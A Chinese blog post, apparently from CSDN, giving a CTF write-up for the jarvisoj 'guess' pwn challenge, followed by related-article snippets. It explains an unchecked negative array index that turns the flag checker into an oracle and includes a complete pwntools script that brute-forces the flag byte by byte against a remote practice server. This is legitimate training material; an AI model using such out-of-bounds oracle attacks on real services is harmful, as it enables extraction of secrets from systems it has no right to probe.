jarvisoj_guess(下标越界导致盲注)

最新推荐文章于 2022-02-28 20:20:30 发布
最新推荐文章于 2022-02-28 20:20:30 发布
阅读量394 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/106694793
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

jarvisoj_guess(下标越界导致盲注)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,转换的时候没有检查flag_hex[2*i]和flag_hex[2*i+1]的值是否向上越界,如果向上越界,我们可以令flag_hex[i]为’0’,而flag_hex[i+1]为p8(offset),这样s[i] = value2 | 16 * value1的值就是value2就是bin_by_hex[flag_hex[2*i+1]]也就是bin_by_hex[offset],那么如果取到上面v4的内容,就能通过比较。

然后,我们就可以单字节爆破了

#coding:utf8
from pwn import *


#预先生成一个可以pass的payload
payload = ''
for i in range(50):
   payload += '0'
   payload += p8(0x100-0x40 + i)

sh = remote('node3.buuoj.cn',28532)
#接下来,就可以逐字节爆破了
flag = ''
for i in range(1,51):
   print "guess the index {}'s char".format(i)
   for c in range(32,128):
      pay = payload[0:2*i-2] + hex(c)[2:] + payload[2*i:]
      #print pay
      #sh = remote('127.0.0.1',9999)
      sh.sendlineafter('guess> ',pay)
      ans = sh.recvuntil('\n')
      if 'Yaaaay!' in ans:
         flag += chr(c)
         break
   print 'flag=',flag

sh.close()

 

ha1vk
关注
专栏目录
MYGAMEs.zip_YRY_guess number
09-24
本项目“MYGAMEs.zip_YRY_guess number”即是一个利用FSM在VHDL中实现的猜数字游戏。 首先,我们要理解猜数字游戏的基本规则:系统随机生成一个预设范围内的数字,玩家进行猜测,然后系统根据玩家的猜测给出提示...
(Jarvis Oj)(Pwn) Guess
Nothing
06-17 616
(Jarvis Oj)(Pwn) Guess 查看保护。没开什么保护。 丢到ida中查看程序逻辑。前面不用看,找到handle函数。 可以看到输入是用fget函数处理的,限制了输入的长度,所以不好溢出。再看看flag_correct( )函数。 在nc连远程服务器的时候也提示说,要将flag先encode成hex,所以50个字符的flag就成了100个字符,程序首先判断长度是否...
jarvisoj——Guess
王嘟嘟的博客
07-30 365
题目 Wp 查一下基础项 这道题卡了很久,实际上最核心的是 char数组 129时=-1 前面这些通过socket进行连接,和主题无关 看到head可以看到这里才是关键的地方 看到这里可以知道,实际上就是把bin_by_hex值和flag进行对比 内存中bin_by_hex和flag相差0x40 我们可以通过char数组溢出的方法进行查看falg,129=-1,依次类推 然后再对flag进行爆破 from pwn import * io = remote('pwn.jarvisoj.com',
BUUCTF jarvisoj_guess
BengDouLove的博客
04-22 327
博文1 博文2 首先这是我看的两个wp,第一个博主讲的很多 main函数里面对我来说有一些难点,就是socket编程,正在学计网,到学期后半段可能会有写socket编程的作业,先了解一下 SOCKET 看到这里就能看出,程序里面也用到了其中一个结构 sockaddr_in 这个结构就是保存socket的信息的 这是地址族,看不太懂,可能和这道题没太大关系,堆在这用到的时候看一下...
[JarvisOJ][pwn]Guess
九层台
07-01 860
练习了一个oj平台上的题,感觉收货很多,在这里记下来。 liu@liu-F117-F:~/桌面/oj/猜测$ checksec 1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/\xe7\x8c\x9c\xe6\xb5\x8b/1' Arch: amd64-64-little RELRO: No RELRO Sta...
#2766. 猜测(guess
Mystletainn的博客
05-27 266
题目描述 有一块棋盘,棋盘的边长为100000,行和列的编号为1到100000。棋盘上有n个特殊格子,任意两个格子的位置都不相同。 现在小K要猜哪些格子是特殊格子。她知道所有格子的横坐标和纵坐标,但并不知道对应关系。换言之,她只有两个数组,一个存下了所有格子的横坐标,另一个存下了所有格子的纵坐标,而且两个数组都打乱了顺序。当然,小K猜的n个格子的位置也必须都不相同。 请求出一个最大的k,使得无论小K怎么猜,都能猜对至少k个格子的位置。 输入格式 输入数据第一行包含一个整数n。 接下来n行,每行描述一个特殊格
guess-game.zip_guess game_猜数字
09-20
猜数字可以算是一种益智类小游戏,一般两个人玩,也可以由一个人和电脑玩,可以在纸上、在网上都可以玩。这种游戏规则简单,但可以考验人的严谨和耐心。 这个游戏的规则比较简单,一般两个人玩,一方出数字,一方猜...
guess_guess_
09-29
标题“guess_guess_”暗示着我们正在处理一个与数字猜测游戏相关的程序,这通常是一个简单的计算机编程练习,用于教授基础的随机数生成和用户输入处理。在这个游戏中,计算机生成一个秘密数字,然后用户尝试猜出这个...
guess_num_net.zip_guess_num_猜数字_网络 猜数字
09-24
标题中的"guess_num_net.zip_guess_num_猜数字_网络 猜数字"表明这是一个关于网络猜数字游戏的压缩包文件,其中可能包含了实现这个游戏的源代码、文档或可执行文件。描述提到这是一个简单的网络猜数字程序,适合初学...
Guess-the-word.rar_The C Word_guess组成单词
09-20
《C语言实现的猜单词游戏——“Guess-the-word”》 在编程世界中,游戏是学习新语言和技术的绝佳方式。本次我们关注的是一个基于C语言实现的猜单词游戏——"Guess-the-word"。这个游戏简单有趣,适合初学者练习编程...
guess-language:猜测文本的自然语言(成语)
05-19
猜测语言 猜测文本的自然语言(成语)。 安装 下载并安装: go get github.com/jonathansp/guess-language 将其导入您的代码中: import "github.com/jonathansp/guess-language" 用法 package main import ( "fmt" "github.com/jonathansp/guess-language" ) func main () { lang , _ := guesslanguage . Parse ( "We know what we are, but know not what we may be." ) fmt . Print ( lang ) } 作者 乔纳森·西蒙·普拉茨(@jonathansp)
guess:猜测的源代码和一些工具
05-09
关于这个项目 该项目是用php构建的Socguess项目的Server。 我们使用mysql和redis存储一些tmp数据以提高性能。 使用Yaf路由http请求。 目录 . ├── README.md ├── config // project config ├── library // some local api ├── webroot/index.php // entry file ├── modules/Inner/controllers //code for request controllers ├── scripts/contract_guess.js // abi of the guess contract ├── scripts/contract_soc.js //abi of the soc contract ├── script
JarvisOJpwnguess
苗_的博客
02-26 266
先看一下函数结构: main: int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { struct sockaddr addr; // [rsp+0h] [rbp-20h] __pid_t v4; // [rsp+14h] [rbp-Ch] int v5; // [rsp+18h]...
盲注--理论知识
adaosanqian的博客
02-28 3749
关于布尔盲注和时间盲注的基础知识讲解
jarvis guess
发蝴蝶和大脑斧的博客
03-04 199
知道了两个知识:一个数组下标溢出,C语言允许下标为负,若不检查则可能泄露邻接处的数据;第二个fork。 一开始没找到溢出点,找了wp才知道思路,由于flag和given_flag和bin_by_hex在栈上相近,同时value1 = bin_by_hex[flag_hex[2 * i]]; value2 = bin_by_hex[flag_hex[2 * i + 1]];没检查下标不能小于0,通过...
SQL注入3(盲注
嚴 帅的博客
04-26 501
一、布尔型盲注 布尔型盲注是由于页面提交数据在与数据交互是完全没有在页面上出现回显数据,只会出现数据提交正确和错误俩种不同页面(报错型至少语法错误会回显错误在页面上)或者无法使用联合查询。 前三个步骤还是像前面联合注入和报错注入相同,需要判断出闭合方式。然后利用页面给我们呈现出的正确和错误的不同回馈来逐个猜测数据库中的内容。因为是通过猜测来判断数据库中的信息,显然这里就需要用到脚本来实现判断。...
实验吧-Guess Next Session Writeup
baynk的博客
08-23 310
没睡午觉,来一发。。。 这个真的是做的最快的一次。。。啊啊啊~ 过程 链接:http://ctf5.shiyanbar.com/web/Session.php 这题出来的很简单,但是我研究出来还是花了点时间去做实验的,先说答案,什么都不填,直接Guess就OK了。 再说说为啥吧,下面有个查看源代码。 拿到flag的条件只有两个,第一,password必须由get提交,第二有参数提交后要和$_se...
jarvisoj——Test Your Memory
王嘟嘟的博客
07-31 764
题目 Wp 基本项检查,32位,开了NX,got表可写 这里看到alphanum_2626和mem_test 跟进mem_test,可以看到是scanf 这里可以看到偏移,直接上payload 这里一定要有返回地址,不然程序奔溃之后看不到flag from pwn import * sh = remote("pwn2.jarvisoj.com",9876) e=ELF('./TestYourMemory') sys_addr=e.symbols['system'] cat_flag_addr=e
(Jarvis Oj)(Pwn) Smashes
Nothing
06-14 2427
(Jarvis Oj)(Pwn) Smashes 查看保护。打开了栈保护。看上去有点麻烦。 再来分析下程序代码。如下是主要的函数体部分。 这个函数首先让我们输入name字符串,通过gets()函数,是有溢出的,但是在输入过长的字符串时程序会abort。 并且提示 ./smashes terminated 这里其实是ssp(Stack Smashing Protector)的提示...
av_guess_format png
最新发布
09-05
av_guess_format png 是指使用 Libav 的 av_guess_format 函数来判断给定的文件扩展名是否为 png 图像文件的格式。 Libav 是一个开源的音视频处理库,其中的 av_guess_format 函数可以根据给定的文件扩展名来猜测文件的格式。在这个例子中,av_guess_format 接受参数 png,并返回相关的文件格式。 png 是一种无损压缩的图像文件格式,它支持存储高质量的图像,并且可以保留图像中的透明通道。这种格式通常用于图像的存储和传输,因为它可以减小文件的大小而不会影响图像的质量。 因此,av_guess_format png 的返回值可能是一个与 png 相关的文件格式,比如说 PNG、MNG(多图像网络图形)、APNG(动画网络图形)等等。这个函数的作用是根据文件扩展名来推测文件的格式类型,从而为后续的音视频处理提供参考。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值